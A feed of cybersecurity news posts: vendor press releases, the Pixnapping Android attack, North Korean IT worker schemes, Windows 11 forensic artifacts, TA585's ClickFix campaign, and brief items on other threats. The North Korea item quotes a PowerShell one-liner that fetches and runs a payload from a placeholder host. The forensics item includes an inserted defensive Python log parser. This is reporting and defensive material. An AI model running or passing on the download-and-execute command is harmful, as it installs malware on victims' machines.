• Torrance, United States, October 14th, 2025, CyberNewsWire

    Criminal IP at Booth J30 | Sands Expo Singapore | October 21 – 23, 2025

    Criminal IP, a global cybersecurity company, announced its participation in GovWare 2025, Asia’s largest cybersecurity conference, which will be held at the Sands Expo in Singapore from October 21 to 23.

    At the event, Criminal IP will showcase its flagship platform, introducing its innovative security strategies in Attack Surface Management (ASM) and Cyber Threat Intelligence (CTI) to the global market.

    Strengthening Global Presence through AI-Powered ASM and CTI

    Criminal IP is a security platform that combines AI-based detection technology with OSINT-based data collection capabilities and currently serves users in over 150 countries worldwide.

    Notably, it integrates Attack Surface Management (ASM) and Cyber Threat Intelligence (CTI) to help organizations detect exposed external assets and proactively respond to threats linked to actual attack vectors.

    Connect with the Criminal IP Team

    At GovWare 2025, CEO Byungtak Kang and the global business team will engage directly with international customers and industry leaders. Key sessions and discussions will focus on the following topics:

    • Real-world cyber threat response strategies
    • Latest security technology trends
    • Platform utilization

    The team will also host on-site meetings at Booth J30, with pre-booking available through the Knowledge Hub > Conference section of the Criminal IP website.

    In addition, attendees can participate in special giveaway events, including the official “Passport Event” organized by the conference host.

    “GovWare is one of the most significant cybersecurity events in Asia and provides a meaningful opportunity to showcase Criminal IP’s innovative technologies,” said Byungtak Kang, CEO of AI SPERA, the company behind Criminal IP.

    “We aim to demonstrate the strength of Korean cybersecurity innovation to global customers and partners while expanding our collaborative ecosystem worldwide.”

    About Criminal IP

    Criminal IP provides its Criminal IP ASM and CTI solutions to users in over 150 countries and has established technology alliances with more than 40 global security companies, including Cisco, Tenable, and Snowflake.

    In 2025, the company reinforced its international presence through consecutive appearances at RSAC 2025, Infosecurity Europe 2025, and Interop Tokyo 2025.

    Recently, the company has been expanding partnerships in key international markets, including the Middle East and Europe, positioning itself as a leading company in the global security ecosystem.

    Contact

    Michael Sena

    support@aispera.com

    The post Criminal IP to Showcase ASM and CTI Innovations at GovWare 2025 in Singapore appeared first on Cyber Security News.


  • Tel Aviv, Israel, October 14th, 2025, CyberNewsWire

    Sweet Security, a leader in Runtime Cloud and AI security solutions, today announced that it has been recognized as both a Cloud Security Leader and a Cloud Application Detection & Response (CADR) Leader in the 2025 Cloud Security Report by James Berthoty of ‘Latio Tech.’

    The 2025 Cloud Security Report offers insights into the evolution of cloud security, tracing the shift from posture-focused tools to real-time, risk-driven platforms powered by runtime insights.

    Recognizing that cloud security choices depend heavily on each organization’s architecture, team size, and security goals, Latio also notes that security operations teams should be given application-layer insight into their running applications.

    The report provides clear, actionable recommendations, structured through a decision tree to help teams design the right cloud security stack for their specific needs.

    The report highlights vendors shaping the future of cloud security through innovation, visibility, and runtime-powered defense.

    Sweet earned two leadership badges for its unique approach to discovering actionable findings in the cloud and for pioneering the use of AI to transform early warning signals into full attack stories.

    According to Latio’s analysis, Sweet Security is built to discover actionable findings in cloud environments. Built for cloud and security operations teams, Sweet provides runtime coverage across applications, workloads, and cloud infrastructure.

    By correlating misconfigurations, identity risks, vulnerabilities, and behavioral signals across the full cloud stack, Sweet empowers teams to prioritize real threats, not just surface-level alerts. 

    “Sweet was a clear choice as a cloud security and CADR leader as innovators bringing the power of runtime protection to practitioners,” said James Berthoty, founder and CEO of Latio Tech. 

    One of Sweet’s most recognized strengths is its AI capabilities that provide prioritization logic and leverage a unique detection approach that identifies suspicious behavior across the cloud stack.

    This enables Sweet to turn early warning signals into full attack stories, tracing attacker activity across the cloud.

    By combining these signals into a single attack narrative across different layers of the environment, Sweet gives operations teams actionable insight to protect their entire cloud.

    Sweet’s key differentiators recognized in the report include:

    • Runtime Protection: Sweet combines runtime insight across vulnerabilities, threats, posture, and identity and extends it all the way back to developers at build time.
    • AI-Powered Investigation: SweetX, the company’s agentic investigator, leverages Sweet’s proprietary LLMs to infer the root cause of an incident and enable rapid response.
    • Robust Detections: Detect attacks as soon as they happen in cloud environments, no matter where they start.
    • Investigation and Response: Sweet reduces investigation time to as little as 2–5 minutes by giving analysts complete, story-like context that includes the full attack impact, visual graph and timeline, achieving a 205-minute mean time to resolution (MTTR).
    • Consolidating Risks and Threats: Combine high-severity posture alerts with real-time attack signals to gain a unified view of your cloud standing and what to address first.

    Latio’s report also highlights Sweet’s expansion into AI SOC workflows and API-layer threat detection, which give teams visibility into their real-time attack surface and data flows across the entire cloud environment.

    “We’re proud to be recognized as both a Cloud Security and CADR Leader by Latio Tech,” said Dror Kashti, CEO and co-founder of Sweet Security.

    “From the start, our goal has been to go beyond alerts and give security teams real-time insight into what’s actually happening in their environments. This recognition shows that the industry is moving toward the same vision, where clarity and runtime understanding drive better cloud defense.”

    About Sweet Security 

    Sweet Security is the leading provider of Runtime CNAPP solutions.

    Powered by comprehensive runtime insights and behavioral analytics, Sweet’s unified platform correlates data across applications, workloads, and cloud infrastructure to deliver real-time detection and response, vulnerability management, posture management, identity threat protection, and API Security.

    Its patent-pending LLM-powered detection engine reduces cloud detection noise to 0.04%, helping organizations achieve industry-leading MTTR benchmarks.

    Privately funded, Sweet is backed by Evolution Equity Partners, Munich Re Ventures, Glilot Capital Partners, CyberArk Ventures, and an elite group of angel investors.

    For more information, users can visit sweet.security.

    Contact

    Chloe Amante

    Montner Tech PR

    camante@montner.com

    The post Sweet Security Named Cloud Security Leader and CADR Leader in Latio Cloud Security Report appeared first on Cyber Security News.

  • Researchers have disclosed Pixnapping, a novel class of side-channel attacks targeting Android devices that can covertly extract sensitive screen data, including two-factor authentication (2FA) codes from Google Authenticator, in under 30 seconds.

    The attack leverages Android’s core APIs together with a hardware vulnerability in graphics processing units (GPUs), affects nearly all modern Android phones, and requires no special permissions, the researchers reported in a paper at the ACM Conference on Computer and Communications Security (CCS 2025).

    Demonstrated on Google Pixel models from 6 to 9 and the Samsung Galaxy S25 running Android 13 through 16, Pixnapping bypasses traditional browser protections to snoop on both web content and native apps.

    The attack’s stealthy nature raises alarms for users relying on apps like Signal, Venmo, and Gmail, as it reconstructs displayed pixels pixel-by-pixel without alerting the victim.

    Pixnapping Attack

    Pixnapping exploits Android’s intent system, which allows apps to launch others seamlessly, combined with stacks of semi-transparent activities that overlay victim screens.

    A malicious app initiates the assault by sending an intent to open a target app, such as Google Authenticator, then layers near-invisible windows to isolate specific pixels using masking techniques.

    These overlays apply blur effects via SurfaceFlinger, Android’s composition engine, creating timing variations dependent on pixel colors due to GPU data compression known as “GPU.zip.”

    On Google devices, the attack measures rendering delays from Mali GPU compression, where uniform (white) pixels compress faster than varied ones, leaking color information through VSync callbacks.

    For Samsung’s Galaxy S25, a variant uses multiple blur regions with varying radii to amplify these discrepancies, achieving similar results despite hardware differences.

    Researchers optimized the technique for ephemeral data like 2FA codes by adapting optical character recognition (OCR)-style probing, targeting just four key pixels per digit in Google Sans font to reconstruct codes before they expire.

    Pixel stealing framework (figure)

    The attack’s reach extends beyond 2FA to private messages in Signal, bypassing its screen security, location histories in Google Maps, and transaction details in Venmo, exposing data never before vulnerable to pixel-stealing methods.

    A survey of 96,783 Google Play apps revealed that all have at least one exported activity susceptible to intents, while web analysis showed Pixnapping endangers 99.3% of top sites via Custom Tabs, far surpassing outdated iframe-based exploits.

    Google assigned CVE-2025-48561 as high-severity and patched Pixel devices in September 2025, though workarounds persist, and Samsung deemed it low-severity due to implementation complexity.

    To mitigate, experts recommend restricting transparent overlays via app allowlists, akin to the web’s frame-ancestors policy, and monitoring for unusual app behaviors.

    Users should update devices promptly and scrutinize app installations, since the attack depends on a malicious app being installed and underscores the risks of Android’s layered UI.

    Affected Components | Description | Examples
    Devices | Modern Android phones with Mali or similar GPUs | Google Pixel 6-9, Samsung Galaxy S25
    Apps Targeted | Native and web apps displaying sensitive visuals | Google Authenticator (2FA), Signal (messages), Venmo (transactions), Gmail
    Android Versions | Core mechanisms present in recent releases | 13-16


    The post New Pixnapping Attack Steals 2FA Codes From Google Authenticator Within 30 Seconds appeared first on Cyber Security News.

  • Since at least 2018, a covert network of thousands of North Korean IT contractors has infiltrated global technology and infrastructure firms by masquerading as legitimate freelancers.

    These operatives, operating under fabricated identities with AI-generated headshots, routinely use VPN services and “laptop farms” to disguise their geographic origins and circumvent platform verification checks.

    Posing as developers, architects, and designers, they secure contracts on major freelancer platforms and enterprise portals, quietly funneling stolen credentials and sensitive data back to their handlers.

    Initially identified through anomalies in VPN exit nodes and account creation patterns, the scheme gained momentum in mid-2024 when infostealer logs began revealing connections from DPRK-owned VPN clients such as NetKey.

    The malware deployed on compromised workstations exfiltrates session tokens, API keys, and SSH configurations, enabling persistent access to corporate networks without raising immediate suspicion.

    Kela Cyber analysts noted that many of these infostealer infections leveraged common development tools—Python, Node.js, and JetBrains IDEs—alongside bespoke loaders disguised as benign executables like Call.exe and Time.exe.

    By blending into legitimate workflows, these operators not only evade detection but also expand the potential impact of their espionage activities.

    In 2025 alone, compromised accounts surfaced on collaboration platforms such as Slack and GitLab, allowing attackers to deploy patches laced with backdoors.

    Personal and sensitive data (Source – Kela Cyber)

    The financial sector experienced surges in fraudulent wire transfers, while critical infrastructure projects saw unauthorized design modifications slip through code reviews—threats that underline the severity of this state-backed campaign.

    Detection Evasion Tactics

    A cornerstone of this operation is the use of geographically dispersed “laptop farms”—collections of remotely controlled machines that rotate through IP addresses to emulate authentic user behavior.

    Upon infecting a workstation, the infostealer executes a PowerShell loader with commands resembling legitimate maintenance scripts, for example:

    powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://malicious.server/payload.exe','payload.exe'); Start-Process '.\payload.exe'"

    This technique not only fetches the infostealer payload under the guise of routine updates but also leverages IP rotation to thwart origin-based security checks.

    In tandem, operators automate identity management via browser sandboxing tools like IxBrowser, assigning unique credentials and multi-factor tokens for each persona.

    These layered tactics ensure that anomalous traffic blends seamlessly with genuine developer activity, complicating forensic analysis and prolonging dwell time.


    The post Thousands of North Korean IT Workers Using VPNs and ‘Laptop Farms’ to Bypass Origin Verification appeared first on Cyber Security News.

  • As Microsoft pulls the plug on Windows 10 support today, October 14, 2025, organizations worldwide face a pivotal shift toward Windows 11.

    Yet adoption has lagged, with Kaspersky’s Global Emergency Response Team (GERT) noting in early 2025 that the decade-old Windows 7 appeared almost as frequently in investigations as the newer OS.

    With Windows 10’s end-of-life accelerating upgrades, incident responders must adapt to evolving digital footprints.

    Kaspersky researchers have released a timely analysis of forensic artifact changes in Windows 11 24H2, offering investigators a roadmap to uncover evidence in this latest iteration.

    Windows 11 Forensic Artifacts

    At the heart of Windows 11’s innovations is the controversial Recall feature, rolled out broadly in May 2025 for devices with neural processing units (NPUs) on ARM CPUs.

    Designed to let users search their activity history via AI-analyzed screenshots taken every few seconds, Recall stores raw JPEG images in %AppData%\Local\CoreAIPlatform.00\UKP{GUID}\ImageStore.

    Metadata embedded in Exif tags reveals window boundaries, timestamps, titles, process paths, and even browser URIs, potentially a treasure trove for reconstructing attacker movements.

    However, privacy fears persist, and Recall is disabled by default in enterprise editions. Its database, primarily the encrypted SQLite file ukg.db, includes tables like App, AppDwellTime, and WindowCapture, detailing app launches, dwell times, and events such as window creations or destructions.

    OCR-extracted text from screenshots populates WindowCaptureTextIndex_content, aiding in spotting sensitive data slips despite filters meant to block incognito modes or password fields.

    Researchers warn that these safeguards falter, making Recall exploitable by malware to harvest credentials. A registry key under Software\Policies\Microsoft\Windows\WindowsAI\ controls its activation, underscoring the need for investigators to check for unauthorized enabling.

    Beyond Recall, standard apps like Notepad now support tabs, persisting states post-termination in %LOCALAPPDATA%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState.

    Subfolders TabState and WindowsState hold binary files with unsaved content, paths, hashes, and timestamps, ideal for recovering malicious scripts or logs from threat actors.

    A companion tool, notepad_parser, automates parsing these artifacts.

    NTFS behaviors have shifted too. In $STANDARD_INFORMATION and $FILE_NAME attributes, actions like renaming or moving files now update access timestamps more aggressively than in Windows 10, altering inheritance patterns.

    Copying or moving between volumes propagates metadata differently, demanding adjusted timelines in analyses, Kaspersky said.

    Category | Windows 10 Behavior | Windows 11 Behavior (24H2) | Forensic Implications
    NTFS Attributes ($STANDARD_INFORMATION) | Access timestamp updates only if system volume <128 GB; rename/move/copy behaviors preserve or inherit metadata selectively (e.g., access unchanged on rename/move within volume). | Access timestamp always updates on access/rename; copy inherits original metadata; move (intra/inter-volume) updates access to current time; rename sets access to modification time. | Timelines more dynamic; requires recalibrating artifact inheritance for file actions, potentially revealing recent manipulations more clearly.
    NTFS Attributes ($FILE_NAME) | Timestamps/metadata unchanged on rename, intra-volume move via Explorer, or Recycle Bin placement. | Inherits access/modify timestamps and metadata from prior $STANDARD_INFORMATION state for these events. | Enhanced tracking of file history; useful for correlating moves/deletions but complicates reconstruction if inheritance masks originals.
    Recall Feature | Not available. | Takes periodic screenshots stored as JPEGs in %AppData%\Local\CoreAIPlatform.00\UKP{GUID}\ImageStore; metadata in Exif tags; encrypted SQLite ukg.db with tables (App, WindowCapture, etc.) for events, OCR text, and app dwell times. | Goldmine for user/activity reconstruction if enabled (disabled by default in enterprise); exploitable for credential theft despite filters; check registry for activation.
    Notepad Artifacts | No tab persistence; basic recent files via registry/MRU. | Tab states in %LOCALAPPDATA%\Packages\Microsoft.WindowsNotepad_8wekyb3d8bbwe\LocalState\ (TabState/WindowsState); binary files with content, paths, hashes, timestamps for unsaved/saved tabs. | Recovers unsaved malicious scripts/logs; parse with tools like notepad_parser; absent if tab saving disabled.
    Program Compatibility Assistant (PCA) | Basic logging; no dedicated text files noted. | New files in C:\Windows\appcompat\pca: PcaAppLaunchDic.txt (launches via Explorer); PcaGeneralDb*.txt (alternating, errors/exits, UTF-16LE). | Tracks legacy app runs (e.g., malware); limited to Explorer launches; Unicode paths break ANSI file.
    Windows Search Index | Single ESE database: %PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows\Windows.edb (version 9180). | Three SQLite databases: Windows-gather.db (file paths via ScopeID), Windows.db (metadata in SystemIndex_1_PropertyStore, table #15), Windows-usn.db (limited value); ESE version 9400 if used. | Easier path reconstruction/metadata extraction; detect malware files via indexing; convert FILETIME timestamps.
    Windows Timeline | Active feature with ActivitiesCache.db for cross-device activity. | Feature removed, but %userprofile%\AppData\Local\ConnectedDevicesPlatform\ActivitiesCache.db persists. | Legacy data available on upgrades; no new entries, but useful for historical analysis.
    Registry Hives | Baseline structure with fewer keys/values. | Over 35,000 added/removed keys/values across hives (e.g., SOFTWARE, SYSTEM); no immediate forensic value identified. | Monitor for new keys (e.g., Recall management); ongoing research needed for significance.
    Event Logs (e.g., ID 4624) | Standard logon fields. | Adds Remote Credential Guard field in Pro 22H2+. | Better authentication telemetry; aids in detecting advanced logons.
    Other Security/Artifacts | NTLMv1 supported; ReFS limited (no boot); Cortana/IE active; Prefetch/LNK/Amcache/Shellbags unchanged. | NTLMv1 discontinued; ReFS bootable with BitLocker; Cortana/IE artifacts remain on upgrades; HVCI/TLS 1.3/DNS over HTTPS default; TPM 2.0 mandatory. | Reduces pass-the-hash risks; challenges NTFS-focused tools on ReFS (no $MFT); consistent artifacts ease transitions.

    New Traces In Search Tools

    The Program Compatibility Assistant (PCA), which has helped run legacy apps since Windows Vista, logs executions in C:\Windows\appcompat\pca.

    Files like PcaAppLaunchDic.txt track recent launches with UTC timestamps and paths, while PcaGeneralDb0.txt and PcaGeneralDb1.txt alternate for detailed records on errors or exits, though limited to Explorer-launched programs.
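As an added triage example (not Kaspersky's code or any tool from the article), the parser below merges the two PCA files into one UTC-ordered timeline and flags executables run from user-writable staging directories or that exited abnormally. It assumes a pipe-delimited line layout for both files, which the article does not spell out, and uses constructed sample content; the lenient ANSI decoding is there because the article notes that Unicode paths break the PcaAppLaunchDic.txt file.

```python
"""Triage parser for the Windows 11 PCA text logs in C:\\Windows\\appcompat\\pca."""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Assumed line layouts (not given in the article):
#   PcaAppLaunchDic.txt : <path>|<yyyy-mm-dd HH:MM:SS.fff>                      (ANSI)
#   PcaGeneralDb*.txt   : <timestamp>|<type>|<path>|<product>|<company>|<version>|<program id>|<exit info>  (UTF-16LE)
TIMESTAMP_FMT = "%Y-%m-%d %H:%M:%S.%f"

# Constructed sample content standing in for the real files (not real log lines).
SAMPLE_LAUNCH_DIC = (
    "C:\\Program Files\\LegacyApp\\legacy.exe|2025-10-14 08:03:11.204\r\n"
    "C:\\Users\\alice\\AppData\\Local\\Temp\\Call.exe|2025-10-14 09:17:45.910\r\n"
    "C:\\Users\\J\xfcrgen\\tool.exe|not-a-timestamp\r\n"  # mangled line; must be skipped, not fatal
).encode("cp1252")

SAMPLE_GENERAL_DB = (
    "\ufeff"  # BOM, as Windows writes for UTF-16LE text files
    "2025-10-14 09:17:46.002|ABNORMAL_PROCESS_EXIT|C:\\Users\\alice\\AppData\\Local\\Temp\\Call.exe"
    "|Updater|Unknown|1.0.0.0|0006abcd|0xC0000005\r\n"
    "2025-10-14 08:05:00.113|PROCESS_EXIT|C:\\Program Files\\LegacyApp\\legacy.exe"
    "|Legacy App|Vendor|2.1.0.0|00012345|0x0\r\n"
).encode("utf-16-le")

# Directories from which a legitimately installed legacy app rarely runs.
SUSPICIOUS_DIR = re.compile(r"\\(Temp|Downloads|Public|ProgramData)\\", re.IGNORECASE)


@dataclass(frozen=True)
class PcaRecord:
    timestamp: datetime  # UTC, as the article notes for these logs
    record_type: str     # "LAUNCH" for PcaAppLaunchDic entries, else the PCA record type
    path: str
    detail: str          # exit code or message for PcaGeneralDb entries, "" for launches
    source: str          # file the record came from


def _parse_ts(text: str) -> datetime:
    return datetime.strptime(text.strip(), TIMESTAMP_FMT).replace(tzinfo=timezone.utc)


def parse_launch_dic(data: bytes, source: str = "PcaAppLaunchDic.txt") -> list[PcaRecord]:
    """Parse the ANSI launch dictionary; only Explorer-launched programs appear here."""
    records = []
    # Non-ASCII path bytes may already be mangled in this file, so decode leniently
    # and drop lines that no longer parse instead of aborting the whole triage.
    for line in data.decode("cp1252", errors="replace").splitlines():
        path, sep, ts = line.rpartition("|")
        if not sep:
            continue
        try:
            records.append(PcaRecord(_parse_ts(ts), "LAUNCH", path.strip(), "", source))
        except ValueError:
            continue
    return records


def parse_general_db(data: bytes, source: str = "PcaGeneralDb0.txt") -> list[PcaRecord]:
    """Parse one of the alternating UTF-16LE error/exit logs."""
    records = []
    text = data.decode("utf-16-le", errors="replace").lstrip("\ufeff")
    for line in text.splitlines():
        fields = line.split("|")
        if len(fields) < 8:
            continue
        try:
            ts = _parse_ts(fields[0])
        except ValueError:
            continue
        records.append(PcaRecord(ts, fields[1].strip(), fields[2].strip(), fields[7].strip(), source))
    return records


def build_timeline(files: dict[str, bytes]) -> list[PcaRecord]:
    """Merge launch and exit records from several PCA files into one UTC-ordered timeline."""
    records: list[PcaRecord] = []
    for name, data in files.items():
        lowered = name.lower()
        if lowered.startswith("pcaapplaunchdic"):
            records.extend(parse_launch_dic(data, name))
        elif lowered.startswith("pcageneraldb"):
            records.extend(parse_general_db(data, name))
    return sorted(records, key=lambda r: r.timestamp)


def flag_suspicious(records: list[PcaRecord]) -> list[PcaRecord]:
    """Triage heuristic: runs from staging directories or abnormal exits deserve a closer look."""
    return [r for r in records
            if SUSPICIOUS_DIR.search(r.path) or r.record_type.startswith("ABNORMAL")]


if __name__ == "__main__":
    timeline = build_timeline({"PcaAppLaunchDic.txt": SAMPLE_LAUNCH_DIC,
                               "PcaGeneralDb0.txt": SAMPLE_GENERAL_DB})
    for rec in timeline:
        mark = "!" if rec in flag_suspicious(timeline) else " "
        print(mark, rec.timestamp.isoformat(), rec.record_type, rec.path, rec.detail)
```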

    Windows Search has migrated from ESE to three SQLite databases under %PROGRAMDATA%\Microsoft\Search\Data\Applications\Windows.

    Windows-gather.db indexes files with paths reconstructible via ScopeID linkages, while Windows.db stores metadata. These enable quick malware file detection, with timestamps in FILETIME format convertible via tools like DCode.

    Minor updates include ditching NTLMv1 to curb pass-the-hash attacks, removing Timeline artifacts (though the databases linger), and expanding ReFS support, which lacks $MFT and short names and so challenges traditional NTFS forensics. Event ID 4624 now flags Remote Credential Guard in logons.

    Kaspersky urges triage tools to integrate these artifacts immediately, as Windows 11’s rise promises richer incident reconstructions amid rising threats.


    The post Kaspersky Details Windows 11 Forensic Artifacts and Changes With Windows 10 for Investigators appeared first on Cyber Security News.

  • The cybersecurity landscape continues to face new threats as sophisticated threat actors develop increasingly complex attack methodologies.

    A newly identified cybercriminal group, designated TA585, has emerged as a significant concern due to its innovative approach to malware distribution and its sophisticated web injection techniques.

    This threat actor operates an entire attack chain independently, from infrastructure management to malware deployment, setting it apart from typical cybercriminal operations that rely on third-party services.

    TA585 primarily utilizes MonsterV2, an advanced multi-functional malware that serves as a remote access trojan, stealer, and loader.

    The malware, which costs between $800-$2000 per month on underground forums, demonstrates the professionalization of cybercrime and represents a premium threat in the current landscape.

    IRS Themed ClickFix Landing leading to MonsterV2, observed on 26 February 2025 (Source – Proofpoint)

    MonsterV2 avoids infecting systems in Commonwealth of Independent States countries and incorporates multiple layers of obfuscation to evade detection.

    The threat actor employs a unique web injection campaign utilizing compromised legitimate websites to serve malware to targeted victims.

    Unlike many other cybercriminal operations that rely on third-party traffic distribution systems, TA585 manages its own filtering mechanisms to ensure real users receive the malicious payload.

    Proofpoint researchers identified this sophisticated operation in April 2025, initially tracking it under the designation “CoreSecThree” based on observed domain patterns and infrastructure characteristics.

    The researchers noted the actor’s evolution from delivering Lumma Stealer to transitioning to MonsterV2 deployment in early May 2025.

    Advanced Web Injection and ClickFix Technique Implementation

    TA585 demonstrates remarkable sophistication in its web injection methodology, utilizing compromised legitimate websites as delivery vectors for the MonsterV2 payload.

    The attack begins when threat actors inject malicious JavaScript into vulnerable websites, creating an overlay system that presents users with fake CAPTCHA verification prompts branded as “Verify you are human” messages.

    ‘Verification’ page owned by the threat actor (Source – Proofpoint)

    The web injection technique leverages a modified version of the ClickFix methodology, originally documented by security researchers in June 2024.

    This approach manipulates users into executing PowerShell commands through social engineering, presenting what appears to be a legitimate verification process.

    The malicious script monitors for Windows+R key combinations from users, creating a reactive web environment that responds to user actions in real-time.

    The attack chain implementation includes sophisticated filtering mechanisms that check multiple system parameters before payload delivery.

    The compromised website continuously beacons to the threat actor’s infrastructure, responding with “Access denied” messages until the PowerShell script successfully completes execution and the malware establishes communication with the command and control server from the same IP address.

    Once this verification occurs, users are redirected to the legitimate website with a “verified=true” parameter, maintaining the illusion of normal browsing behavior.

    The technical implementation involves JavaScript code that creates dynamic overlays on compromised sites:

    // Example TA585 JavaScript injection pattern
    function verifyHuman() {
        // Creates fake CAPTCHA overlay
        displayVerificationPrompt();
        // Monitors for Win+R execution
        monitorKeystrokes();
        // Beacons to command server
        sendBeaconRequest();
    }

    The payload delivery mechanism utilizes PowerShell commands that download and execute MonsterV2 directly from actor-controlled infrastructure.

    The malware establishes persistence through multiple techniques, including privilege escalation attempts requesting permissions such as SeDebugPrivilege, SeTakeOwnershipPrivilege, and SeIncreaseBasePriorityPrivilege.

    MonsterV2 implements a unique mutex creation system using the format “Mutant-” which serves as an effective indicator for threat hunting activities.

    The malware configuration utilizes ChaCha20 encryption with embedded LibSodium libraries for secure command and control communications, demonstrating the advanced cryptographic implementations employed by modern malware authors.


    The post TA585 Hackers Uses Unique Web Injection Technique to Deliver MonsterV2 Malware Targeting Windows Systems appeared first on Cyber Security News.

  • In early 2025, security researchers unveiled a sophisticated botnet implant named PolarEdge, which relies on a bespoke TLS server and a proprietary binary protocol to carry out unauthenticated command-and-control operations. PolarEdge first emerged in January 2025 when honeypots monitoring Cisco routers captured suspicious traffic exploiting CVE-2023-20118. Attackers used a crafted HTTP request with the User-Agent […]

    The post PolarEdge C2 Communication via Custom Binary Protocol with Custom TLS Server appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

  • A novel phishing campaign has emerged targeting Colombian users by abusing judicial notifications and weaponizing Scalable Vector Graphics (SVG) files. This sophisticated attack begins with a carefully crafted Spanish-language email impersonating the “17th Municipal Civil Court of the Bogotá Circuit,” complete with formal legal language and institutional details. The .SVG attachment named “Fiscalia General De […]

    The post Hackers Use Court-Themed Phishing to Deliver Info-Stealer Malware appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
